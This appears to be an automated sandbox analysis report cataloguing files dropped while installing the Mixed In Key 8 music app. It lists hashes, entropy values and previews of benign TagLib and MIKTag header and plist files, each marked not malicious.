Preview:	/*************************************************************************. copyright : (C) 2015 by Tsuda Kageyu. email : tsuda.kageyu@gmail.com. ***********************************************************************/../************************************************************************. This library is free software; you can redistribute it and/or modify . it under the terms of the GNU Lesser General Public License version . 2.1 as published by the Free Software Foundation. . . This library is distributed in the hope that it will be useful, but . WITHOUT ANY WARRANTY; without even the implied warranty of . MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU . Lesser General Public License for more details. .

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/PrivateHeaders/.BC.T_kMetts Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	C++ source, ASCII text
Category:	dropped
Size (bytes):	2343
Entropy (8bit):	4.172153948952005
Encrypted:	false
SSDEEP:	24:/TRz7bfy9lOkHYg/TbVI2+RymPOFes6dw0qAl8yRV5L6n9YhMjeH:/TlTyBHbKjPOLujCyvtj
MD5:	22374241BB60C8308C08F9EB3D4E31AC
SHA1:	62790C390E3B1B0BEBFA2C68C401BB976D323F8D
SHA-256:	B4E1E73D0AFD77B3E49762AE57FB00FAD2CA3208E3CF8EE2E3EC8551544E4AFF
SHA-512:	3A5010EB22ADB00C2DEB5720984FEE5B44C979DF45BDD2B3B3F5269DF198481545E2670F1D7115E0BAE5BDB34ABBADC0A62F3F522C16D1FFA865F1508A5190B2
Malicious:	false
Preview:	/*************************************************************************. copyright : (C) 2015 by Tsuda Kageyu. email : tsuda.kageyu@gmail.com. ***********************************************************************/../************************************************************************. This library is free software; you can redistribute it and/or modify . it under the terms of the GNU Lesser General Public License version . 2.1 as published by the Free Software Foundation. . . This library is distributed in the hope that it will be useful, but . WITHOUT ANY WARRANTY; without even the implied warranty of . MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU . Lesser General Public License for more details. .

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/PrivateHeaders/.BC.T_mlgisU Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	ASCII text
Category:	dropped
Size (bytes):	1064
Entropy (8bit):	5.20229960529526
Encrypted:	false
SSDEEP:	12:UG6gz39IpOysleCj3BLAXxOqqzGf3uN0HONh1W3CSzZ72OKqY72svriJ0yr:Z6gztu45AlU0HGWXz0j0J0M
MD5:	460EB345234433774257552CFA8E1B93
SHA1:	6B6C155710EBA5D4D3BBFE2EF6A0AEBC3B5C2D9C
SHA-256:	A4F6A0EB9563BAE4DD8F5DEE0A4D9A6DC99343CB0BBE075444061104B083CD52
SHA-512:	BC18D60445D72C5530DDBF3DB1ADB3B708A8DA138CF25734B037DD2B57FB6108997F7A1647F2737688299ECAF0D78293665FB058347BDDDF39386BFB3CB038A6
Malicious:	false
Preview:	/* config.h. Generated by cmake from config.h.cmake /../ Defined if your compiler supports some byte swap functions /./ #undef HAVE_BOOST_BYTESWAP /.#define HAVE_GCC_BYTESWAP 1./ #undef HAVE_GLIBC_BYTESWAP /./ #undef HAVE_MSC_BYTESWAP /./ #undef HAVE_MAC_BYTESWAP /./ #undef HAVE_OPENBSD_BYTESWAP /../ Defined if your compiler supports some atomic operations /./ #undef HAVE_STD_ATOMIC /./ #undef HAVE_BOOST_ATOMIC /.#define HAVE_GCC_ATOMIC 1./ #undef HAVE_MAC_ATOMIC /./ #undef HAVE_WIN_ATOMIC /./ #undef HAVE_IA64_ATOMIC /../ Defined if your compiler supports some safer version of vsprintf /.#define HAVE_VSNPRINTF 1./ #undef HAVE_VSPRINTF_S /../ Defined if your compiler supports ISO _strdup /./ #undef HAVE_ISO_STRDUP /../ Defined if zlib is installed /.#define HAVE_ZLIB 1./ #undef HAVE_BOOST_ZLIB /../ Indicates whether debug messages are shown even in release mode /./ #undef TRACE_IN_RELEASE */..#define TESTS_DIR "/Users/patrickmachielse/Docu

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Resources/.BC.T_DS34Hl Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	XML 1.0 document, ASCII text
Category:	dropped
Size (bytes):	1166
Entropy (8bit):	5.195791133189862
Encrypted:	false
SSDEEP:	24:2dfyiwBVw6NFD4Ma6E420gp/AL2PgCGexwMZhGt0b:cfyfVtFkcEj0ge2ICGcwcGt0b
MD5:	12EB6F62A5126169941BAC363014B655
SHA1:	4F4974B27426AB26F491C72D7E020AD51B677419
SHA-256:	587BE47AB79E73075387BFB6512A62A202B405BFF47FFC6E9D01BEAC0CB3EB94
SHA-512:	CD99C3EBEF3ADFAAB411B66DFE2B8950B708B2284CF1A2D74B178046DA0678525A838A0781914DFC57E8A280CE57669FC2E9A750B768D27795372660D68E06FD
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8"?>.<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">.<plist version="1.0">.<dict>..<key>BuildMachineOSBuild</key>..<string>18G95</string>..<key>CFBundleDevelopmentRegion</key>..<string>English</string>..<key>CFBundleExecutable</key>..<string>TagLib</string>..<key>CFBundleIdentifier</key>..<string>com.mixedinkey.TagLib</string>..<key>CFBundleInfoDictionaryVersion</key>..<string>6.0</string>..<key>CFBundleName</key>..<string>TagLib</string>..<key>CFBundlePackageType</key>..<string>FMWK</string>..<key>CFBundleSignature</key>..<string>????</string>..<key>CFBundleSupportedPlatforms</key>..<array>...<string>MacOSX</string>..</array>..<key>CFBundleVersion</key>..<string>1.9.1</string>..<key>DTCompiler</key>..<string>com.apple.compilers.llvm.clang.1_0</string>..<key>DTPlatformBuild</key>..<string>9F2000</string>..<key>DTPlatformVersion</key>..<string>GM</string>..<key>DTSDKBuild</key>..<string>17E189</stri

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/_CodeSignature/.BC.T_HQS0aj Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	XML 1.0 document, ASCII text
Category:	dropped
Size (bytes):	26459
Entropy (8bit):	5.253903856887356
Encrypted:	false
SSDEEP:	192:XIPgz4JoNtzBtDjUi2wqkSKCAZ8inYvv8cwBxtes8Pj7LaNxJ7AupkrEDzko:Y2IwnnWinYER8PjqxJ8uDzd
MD5:	94C0D2157BEDD54BF3ED931EA2CCC128
SHA1:	AACA8AD206F4F20C7BD4612CD4EF73836FA015B8
SHA-256:	41FED2657695021A398FC51E5FFC9EAF4CDF9B46CC508A328BF46B3776439546
SHA-512:	29F01E530246061B0D44B8EB59A9C84D0C156B76F86A0F6378A8001314B267D25E49AFC112A15E24F271EC3807485691AA8183A6D9F8A48C0ADB479F1F055A7B
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8"?>.<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">.<plist version="1.0">.<dict>..<key>files</key>..<dict>...<key>Resources/Info.plist</key>...<data>...T0l0snQmqyb0kcctfgIK1RtndBk=...</data>..</dict>..<key>files2</key>..<dict>...<key>Headers/aifffile.h</key>...<dict>....<key>hash</key>....<data>....ZD2XK2XyK6VP9YH7rZghXDaB3Zo=....</data>....<key>hash2</key>....<data>....LgqAi83+AGd16+LbSbnXIQQhe90Y75F3LzHVXLfQKt0=....</data>...</dict>...<key>Headers/aiffproperties.h</key>...<dict>....<key>hash</key>....<data>....a1znPKP99iZ4PVtVCGdv0haRtJI=....</data>....<key>hash2</key>....<data>....kXrWK9gKkxHDRNofF1AQG5yxMxoFuSLJakK/s2gbziM=....</data>...</dict>...<key>Headers/apefile.h</key>...<dict>....<key>hash</key>....<data>....6uayiA7AeTPFnjm/8l2pFyIkkeQ=....</data>....<key>hash2</key>....<data>....TXb7nMKT6R/4WldamwUdkwaOOE4XGtDH4Y8MUyGipXE=....</data>...</dict>...<key>Headers/apefooter.h</key>...<dict>.

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Headers/.BC.T_0nQV8f Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Objective-C source, ASCII text
Category:	dropped
Size (bytes):	671
Entropy (8bit):	5.236532897403799
Encrypted:	false
SSDEEP:	12:FPmS/PbAUXYrhqdqCieQPQIxAj1Q13nQ9b940WahE:FPmS/j1orcdqrTxAjW70Waa
MD5:	D3DD821A4E9CA34B53AE479B1C5A672C
SHA1:	CAF59198A8CEC7600DD39493F404CC18186FBD8A
SHA-256:	0F18CC17CE9BD40A79D5D6F52442841525D6CC1AF7A76CA313A7FB4131A289B6
SHA-512:	568BA35585C39E4F37961144AEC283F6F121AF0A8BF6657D9FD583513C2ACD0278181749CEB288750081593864EB53878F9CA93106338BA7916151F71D17BF75
Malicious:	false
Preview:	//.// MIKTagComment.h.// MIKTag.//.// Created by Jake Gundersen on 4/3/13..// Copyright (c) 2013 mixedinkey.com. All rights reserved..//..#import <Foundation/Foundation.h>..NS_ASSUME_NONNULL_BEGIN..typedef NS_ENUM(NSInteger, ID3version) {. ID3TagV1,. ID3TagV2.};..@interface MIKTagComment : NSObject..@property (nonatomic, strong) NSString comment;.@property (nonatomic, copy, nullable) NSString originalComment;.@property (nonatomic, strong, nullable) NSString *lang;.@property (nonatomic, assign) ID3version tagVersion;.@property (nonatomic, assign) BOOL isPrimary;.@property (nonatomic, assign) BOOL v1CommentMatchesv2Comment;..@end..NS_ASSUME_NONNULL_END.

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Headers/.BC.T_0xZv2r Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Objective-C source, ASCII text
Category:	dropped
Size (bytes):	503
Entropy (8bit):	5.303729905427616
Encrypted:	false
SSDEEP:	12:qm2dgJwhNzFtoKQ9hYB/qXqlGYx72dLcn:qm2eShNptrQEMaMYx72dLc
MD5:	571914AC4AC0B114F897F3C76F30352B
SHA1:	66A57B30A2C965655AF0BFF06F4FBB4AAFCC96E9
SHA-256:	72FE6B3ABE75CFF55FCDD707CC707B7AEEA67AF446FDCEE4B68A19836C49738C
SHA-512:	B7658C7924D6A49B55A51B7835B59C9928FF00DBBFFD8B358D1D1411E58F79141FAD2E2687172409556471303B1455648ED07CF53656C88B4047222B8A5282D8
Malicious:	false
Preview:	//.// MIKTagID3.h.// MIKTag.//.// Created by patrickm on 21-01-10..// Copyright 2010 Mixed In Key LLC. All rights reserved..//..#import "MIKTag.h"../!. @header..MIKTagID3. @abstract Support for ID3v1 and ID3v2 files. @discussion TagLib upgrades v2 frames to v2.4.....http://www.id3.org/ID3v1.....http://www.id3.org/id3v2.4.0-frames./.@interface MIKTagID3 : MIKTag.@end..//.utility.FOUNDATION_EXPORT NSString * _Nullable MIKTagDecodeGRP1FrameData(const char * _Nullable data, uint len);.

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Headers/.BC.T_1nyrNU Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Objective-C source, ASCII text
Category:	dropped
Size (bytes):	533
Entropy (8bit):	4.999493853489908
Encrypted:	false
SSDEEP:	12:0Pm2aS/qb7UWIUcRZOU2g3b2hy4zybFK6XXBhle:Km2zgLItkU2e204zkFK6hO
MD5:	4EC1C96AEDF35E6B65692B52919D4B71
SHA1:	9242C5A438C11812348AE1B837DA1E23563D9F2C
SHA-256:	F2E1F2109F4E9E37E88ACC3D208CBB78435D6701A50CAB51666296099C34D6C9
SHA-512:	573FB9D0D30CD77B9A9CE858056141BAC23A3EAEC88F42C7E8D19E6CDBCD04DB1A937E96FBB8D9833563BD493C207CC4063575F2B4F2A58709EDEA39BAF88A22
Malicious:	false
Preview:	//.// MIKTagAIFF.h.// MIKTag.//.// Created by patrickm on 10-08-12..// Copyright (c) 2012 mixedinkey.com. All rights reserved..//..#import "MIKTagID3.h"../!..@header..MIKTagAIFF..@abstract Support for tags in aif(f) files..@discussion This class reads / writes ID3v2 tags which can be stored in a RIFF chunk......These are supported by iTunes and other audio apps. There is no suppport.....for reading or writing 'native' tags which are often used by professional.....applications.. /.@interface MIKTagAIFF : MIKTagID3..@end.

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Headers/.BC.T_4PeKLG Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Objective-C source, UTF-8 Unicode text
Category:	dropped
Size (bytes):	618
Entropy (8bit):	5.02936468421991
Encrypted:	false
SSDEEP:	6:hzKnIeiYjJNRUQfOxFN07IH0W2Qm20vV7U8K1sgZ25ZQO86v9H4lNZHAhVFXqKVn:hmpPRU7bNH0rFfvN4lN5AhKIn
MD5:	F1D2F3CA3F9285165C8A5FDDCEF71BCA
SHA1:	4D4EACBE7689459D986C45E5BA391B100248A218
SHA-256:	5787ED8D48D0CCB05A8DA1A711F604BEBEF4B7BF361329223F61146A32DCD441
SHA-512:	093533B179FA43A2AE9DD93DF9C2CD6AC0ADCC7B83A68E34CEBCE2B512EEB3C2FFE9BCABCF75705947FD1B52BE2AEAD3E991F6758A53DA6294B146056C2E01F5
Malicious:	false
Preview:	//.// MIKTagHeader.h.// MIKTag.//.// Created by Andrew Madsen on 11/18/15..// Copyright . 2015 mixedinkey.com. All rights reserved..//../** Umbrella header for MIKTag public interface. */..#import <MIKTag/MIKTag.h>.#import <MIKTag/MIKTagComment.h>.#import <MIKTag/MIKTagCustomProperties.h>..#import <MIKTag/MIKTagCopying.h>.#import <MIKTag/MIKTagUtil.h>..#import <MIKTag/MIKTagAIFF.h>.#import <MIKTag/MIKTagFLAC.h>.#import <MIKTag/MIKTagID3.h>.#import <MIKTag/MIKTagMP4.h>.#import <MIKTag/MIKTagWAV.h>..#import <MIKTag/MIKTraktorDatabase.h>.#import <MIKTag/MIKTraktorQueue.h>.#import <MIKTag/MIKRekordboxQueue.h>.

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Headers/.BC.T_8RzSUX Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Objective-C source, ASCII text
Category:	dropped
Size (bytes):	1143
Entropy (8bit):	5.112987200807635
Encrypted:	false
SSDEEP:	24:PPm2D13qtxbCLLkIgkwlp1hAkTCL6bXyBAWO2W/n:3m2D13qzawIZwphzTCGbi2H2U
MD5:	A2A2FD325B7A0EDD17C1648D5CFFEBF9
SHA1:	E7C38BD56AFE1555AF8B467D48CF3CC9825B26C8
SHA-256:	3BA336C4D8B5EC33B3353CEE8DC4580DD344BE591E01F5BF70DBE0107D3FF242
SHA-512:	B5C281A192E6BAFAD8F4021BE480A586285177D6FAD6244371985591B11628324DE35579ABAEA9AF4DDCB045124C0792105DDD27E43988E365DB47CB0B73435C
Malicious:	false
Preview:	//.// MIKTagCuePoint.h.// MIKTag.//.// Created by patrickm on 10-10-14..// Copyright (c) 2014 mixedinkey.com. All rights reserved..//..#import <Foundation/Foundation.h>.../!..@header..MIKTagCuePoint..@abstract .Top level cue point class...@discussion.Clients use this class to get / set cue points. Cue points are the least common denominator. ....of Serato, Traktor, and RekordBox cue points, just containing time and name/label information.. /..@interface MIKTagCuePoint : NSObject <NSCopying>..+ (instancetype)cuePointWithTime:(NSTimeInterval)time name:(NSString )name;.- (instancetype)initWithTime:(NSTimeInterval)time name:(NSString )name;..- (BOOL)isEqualToCuePoint:(MIKTagCuePoint )other;..@property (nonatomic, assign) NSTimeInterval time;...//.the start time of the cuepoint [seconds].@property (nonatomic, copy) NSString name;.....//.the cue point name / label, displayed in 3rd party app.@end..#pragma mark -..@interface NSArray (MIKTagCuePoint).@property (nonatomic, readonly)

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Headers/.BC.T_Db6Mld Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Objective-C source, ASCII text
Category:	dropped
Size (bytes):	338
Entropy (8bit):	4.985513256272894
Encrypted:	false
SSDEEP:	6:alIgu/VgJwT09mvWlS8CkRw4yRRNwoBQW8HQDJ6wXwz7JZCSrAn:9dgJwhUCQWd96iMrA
MD5:	CC4CF75DA87277F9D1B1CDD60B56D1FB
SHA1:	0C3B645BBE871C73BDAB31E90878BAFED076C445
SHA-256:	9C5A2EE92B5EAF75A1B157EFF5FFA57E78B1F4160353E328E9C20328F6AE2E75
SHA-512:	1E355D19FD27F55D17ADA37E780245B942FED2A30F9D28A8984EE3EA00E474070C34616D62AC5890754E232C9BB2177A50D8310101AB401E5405AA043DD1DD1A
Malicious:	false
Preview:	//.// MIKTagMP4.h.// MixedInKey.//.// Created by patrickm on 21-01-10..// Copyright 2010 Mixed In Key LLC. All rights reserved..//..#import "MIKTag.h"../!..@header..MIKTagMP4..@abstract Support for tags in m4a and mp4 files..@discussion We are relying on the similarity between m4a and mp4.. /.@interface MIKTagMP4 : MIKTag..@end.

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Headers/.BC.T_FO3DQw Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Objective-C source, ASCII text
Category:	dropped
Size (bytes):	1699
Entropy (8bit):	5.2272972817655265
Encrypted:	false
SSDEEP:	48:oSC1Nu3UhXe45RmUMtelRIQjQt/hIlVYLjiI2ieMikDxYDad96NAd:bMNu3UQ/EpEIahrsK
MD5:	2F9A6D0B9E011DD0B291001690319462
SHA1:	623FA413ED005296EB0EE2FE42B95B0208170589
SHA-256:	724362C2E6443C0C5C32E20949CB5AD3893371E2168790B6AACB735305917DB9
SHA-512:	479C62144A1F5323AC12006A8EEE046B13FC2F14C66CEB852A453B87729CED407DB6A27DE22194ECDD55C080081A6DD03E7CB031DDDBC6E19C53226515E0ADBA
Malicious:	false
Preview:	//.// MIKTraktorDatabase.h.// MixedInKey.//.// Created by Andrew Madsen on 10/7/14..// Copyright (c) 2014 Mixed In Key LLC. All rights reserved..//..#import <Foundation/Foundation.h>.#import <MIKTag/MIKTraktorTrack.h>.#import <MIKTag/MIKTraktorPlaylist.h>.#import <MIKTag/MIKTraktorCuePoint.h>...extern NSString const MIKTraktorFileFolderSandboxedBookmarkDataKey;../. This class is used to read from and write to a Traktor XML database file.. * It is used by Mixed In Key to save cue point information generated during. * MIK analysis to Traktor.. .. .@see https://mikteam.fogbugz.com/default.asp?W76. /.@interface MIKTraktorDatabase : NSObject..@property (nonatomic, strong, readonly) NSArray<MIKTraktorTrack > tracks;.@property (nonatomic, strong, readonly) NSArray<MIKTraktorPlaylist > playlists;.@property (nonatomic, assign, getter=isTraktorDBLoaded) BOOL traktorDBLoaded;.@property (nonatomic, readonly) NSDate fileModificationDate;.@property (nonatomic, readonly) BOOL need

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Headers/.BC.T_IFohl1 Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Objective-C source, UTF-8 Unicode text
Category:	dropped
Size (bytes):	399
Entropy (8bit):	5.106909980254568
Encrypted:	false
SSDEEP:	12:NPm2g7UYbAUUNNXq5GlaIhHPHhiQPjoSSn:NPm2xq16XqSa27oSSn
MD5:	D95A06BFE24AD883620128FAE44E1552
SHA1:	8A01DE242D3EA1889E41DE61AC416AFB7F91E32F
SHA-256:	1C8F0B0DA4D298B183342B148E9576ED3375BB06FC42DB45A655D4EC1F4E38B3
SHA-512:	7FB9D9DAB96C45DD58393FADAAD3B560014E10FA6C4BCA62120E4949BC7E5BD55D5D81228D5B48282D52DBB73878A11663C6C5D4454558C0A18A59894C9021D7
Malicious:	false
Preview:	//.// MIKTraktorPlaylist.h.// MIKTag.//.// Created by patrickm on 15-06-16..// Copyright . 2016 mixedinkey.com. All rights reserved..//..#import <Foundation/Foundation.h>...@class MIKTraktorTrack;..@interface MIKTraktorPlaylist : NSObject.@property (nullable, nonatomic, readonly, copy) NSString name;.@property (nullable, nonatomic, readonly, strong) NSArray<MIKTraktorTrack > *tracks;.@end.

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Headers/.BC.T_PI5ycv Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Objective-C source, ASCII text
Category:	dropped
Size (bytes):	1891
Entropy (8bit):	5.183982005146498
Encrypted:	false
SSDEEP:	48:al14Q26BnYA1HBHGYlE0sgXNkaUAMx7uKr:C4gHBs8XVUvxiKr
MD5:	C7688F10BDDB40D82506E7241D82C636
SHA1:	E19C7564D5CAA302CC38CB250D518446E2E5CC63
SHA-256:	375030A444B7000A4AD262EB4F720A2C408DF417F4BE87CA811808B92E026FDA
SHA-512:	767C865BCCB66AE4D3DD10B2F45C5081DA385F09C191D1E186DD3D0791EF67FD4D64B897C1BA981235C99AB2549AB6979396ACAEAF631583232BA6870051FD40
Malicious:	false
Preview:	//.// MIKTagUtil.h.// MixedInKey.//.// Created by patrickm on 21-01-10..// Copyright 2010 Mixed In Key LLC. All rights reserved..//..#import <Foundation/Foundation.h>.../!..@header..MIKTagUtil..@abstract Utility functions for working with m4a and id3 tags...@discussion TagLib is used to handle m4a tags as well. CoreAudio still.....doesn't support m4a at all in 10.6. Quicktime might, but the.....code is very arcane and will become obsolete.. /../!..@function.dprintV2Tag..@abstract Print the description of an mp3 tag...@param tag A TagLib::ID3v2 tag...@discussion Uses 'void ' because of TagLib header import complications.. /.FOUNDATION_EXPORT void dprintV2Tag(void / TagLib::ID3v2::Tag / tag);../!..@function.dprintMP4Tag..@abstract.Print the description of an mp4 tag...@param..tag A TagLib::MP4 tag...@discussion.Uses 'void ' because of TagLib header import complications.. /.FOUNDATION_EXPORT void dprintMP4Tag(void / TagLib::MP4::Tag / tag);../*!..@function.MIKTa

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Headers/.BC.T_PvNSzN Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Objective-C source, ASCII text
Category:	dropped
Size (bytes):	2284
Entropy (8bit):	4.953907337583394
Encrypted:	false
SSDEEP:	48:QmpR1p+V7b5TIjKqhZOQjrI+2yKvgfwygGkNKcGD9rK8:QmpLp+V7FwbO8yuK8
MD5:	7745203F79ED739A31C0E6AB5D133DCF
SHA1:	E3FCEDACC13CCE846613B344B1EFBDCBFE32C053
SHA-256:	6329BBADC51250069AD2E3FE4A114A522A310755024A9FB442F4902308A1D22D
SHA-512:	EB4AE5F2F434DB7E4D23F68109421AFC92C831078B452FE05571F955EF071343D4FFADB1FCF2D07A5AC772712D1FCCE347EDD7C109349FADDFCF87CD8EFC596C
Malicious:	false
Preview:	//.// MIKTraktorCuePoint.h.// MIKTag.//.// Created by Andrew Madsen on 10/8/14..// Copyright (c) 2014 mixedinkey.com. All rights reserved..//..#import <Foundation/Foundation.h>..typedef NS_ENUM(NSInteger, MIKTraktorCuePointType) {..MIKTraktorCuePointTypeCue.. = 0,..MIKTraktorCuePointTypeFadeIn,..MIKTraktorCuePointTypeFadeOut,..MIKTraktorCuePointTypeLoad,..MIKTraktorCuePointTypeGrid,..MIKTraktorCuePointTypeLoop.};..@class MIKTagCuePoint;../**. .For reasons of optimization and simplicity, MIKTraktorCuePoint is immutable.. .When cuepoints need to change, create new objects and add them to MIKTraktorTrack.. . .Traktor has 8 slots for cue points. By default (?) the auto-grid cue point will occupy. .the first slot, leaving 7 emtpy slots for user cue points. However, it is possible to. .set a preference named 'Store beat marker as hot cues' to keep the grid marker hidden. .and free up the first slot, making the total number of cue point slots 8. When this. .setting is not activated the re

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Headers/.BC.T_QltrtV Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Objective-C source, ASCII text
Category:	dropped
Size (bytes):	1403
Entropy (8bit):	5.059923013894868
Encrypted:	false
SSDEEP:	24:FmpR1P9mWYm8e3d540gTqvWxTxyRBs7qc8fy:FmpR1PM3eWxTYns7qc8fy
MD5:	F80547E1EAA691AB377F92A9810817C7
SHA1:	B5AAC4E22F0C24BB778F1497ACFA19182C76F995
SHA-256:	1CE052D2745FCE6AD7A577FA9DA3C7F839C36A066545465BB7804DD7FD4FEEAB
SHA-512:	B07FF9C6F2EAE99A12A6FDF17419EBDCC786B7B756C46B8F77595BA51DEF642D84B89D45E237BCE56F01BBD020087D729015004D406F8DD5900DC987B7D9B6A3
Malicious:	false
Preview:	//.// MIKRekordboxTrack.h.// MIKTag.//.// Created by Andrew Madsen on 10/8/14..// Copyright (c) 2014 mixedinkey.com. All rights reserved..//..#import <Foundation/Foundation.h>..@class MIKRekordboxDatabase;.@class MIKRekordboxCuePoint;..@interface MIKRekordboxTrack : NSObject..@property (nonatomic, readonly) NSInteger trackId;.@property (nonatomic, strong, readonly) NSString path;.@property (nonatomic, readonly) NSString filename;.@property (nonatomic, strong, readonly) NSArray cues;.//@property (nonatomic, readonly) NSDate modificationDate;.@property (nonatomic, readonly) NSArray beatTimes;..@property (nonatomic, readonly) NSString decomposedStringWithCanonicalMapping; /* optimization /.@property (nonatomic, strong, readonly) NSXMLElement xmlElement;..@property (nonatomic) BOOL forceDummyCuePoint; // Set to yes to output a single dummy cue point when none exists..// A dummy cue point is needed to allow deletion of cue points for a song in rekordbox, if there.// are no

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Headers/.BC.T_WgbOrP Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Objective-C source, ASCII text
Category:	dropped
Size (bytes):	433
Entropy (8bit):	5.132424191336495
Encrypted:	false
SSDEEP:	6:m5bzKnIguH3//QxFN09/lS8CcERw460oBQWIUcRRfMYMGBf3RnQ4ReLrr48KSqtN:mlm2X//qb8EPRWIUcRPM0t7mZDUge
MD5:	CE2067E9C8EEB14D316338608830E9F9
SHA1:	5BCF1C31F3330C564E9889406EB459F01A23C9F0
SHA-256:	DF1DF2DF635464A1AFAF046FC447CA1EC653EB1C9FE1519C276A906C9B16BB2F
SHA-512:	D95EFD7EA3F9DA284DA1ACCDF08C8E0A4831DAEB0D396F39B2975A342C5D434B932E8AA183CCB8BE103816AC913D8B71B57E01B06CA09A2329356A9FA7C82863
Malicious:	false
Preview:	//.// MIKTagFLAC.h.// MIKTag.//.// Created by patrickm on 29-08-12..// Copyright (c) 2012 mixedinkey.com. All rights reserved..//..#import "MIKTagID3.h"../!..@header..MIKTagFLAC..@abstract Support for tags in flac files..@discussion This class reads / writes Xiph and embedded ID3 (v1 and v2) tags.....If Xiph tag values take precedence when they are found......http://www.xiph.org. /.@interface MIKTagFLAC : MIKTagID3..@end.

